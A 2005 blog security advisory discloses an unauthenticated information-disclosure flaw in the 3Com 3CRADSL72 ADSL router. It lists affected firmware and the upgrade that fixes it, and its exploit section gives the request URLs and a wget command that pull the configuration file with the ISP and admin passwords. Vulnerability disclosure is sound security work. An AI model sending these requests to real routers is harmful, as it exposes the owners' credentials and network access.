3com adsl 11g cradsl72 router config.bin information disclosure

Saturday, April 02, 2005
########################################
3com adsl 11g 3cradsl72 router config.bin information disclosure.
vendor url:http: www.//3com.com/
vendor notified: yes exploit avaible : yes
advisore url:http://lostmon.blogspot.com/2005/04/
3com-adsl-11g-cradsl72-router.html
dicovered by Lostmon & vIOsOnE
last update: 2005/04/02 update solution.
OSVDB ID:15181
Secunia: SA13942
########################################

A few time ago some flaws are discovered on 3com wireles cradsl72 router:
A new flaw was discovered by me and vIOsOnE A remote user can obtain
al details about configuration of the devide and all passwords (
Internet provider and router password ) without authentication.

firmware versions affected :

1.02b afected
1.05 afected
1.10 not afected

solution:

Upgrade to version 1.10 or higher, as it has been reported to fix this vulnerability.
An upgrade is required as there are no known workarounds.

exploit :

1 open your router with this address http://[target]app_sta.stm
we look the pass of the Internet provider.

2- copy and paste this URL http://[target]/cgi-bin/config.bin
and we obtain the configurations file , inside are all details about
configuration including the pass of the device.


also if you like to bypass all authentication and don´t use
a web browser you can use wget tool and get this

wget http://xxx.xxx.xxx.xxx/cgi-bin/config.bin

and with wget we need only one url to exploting this issue


thnx to estrella to be my ligth
thnx to all who day by da suuport me
thnx to vIOsOnE he is with me and investigate ;)
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data mangler of: http://www.osvdb.org

La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...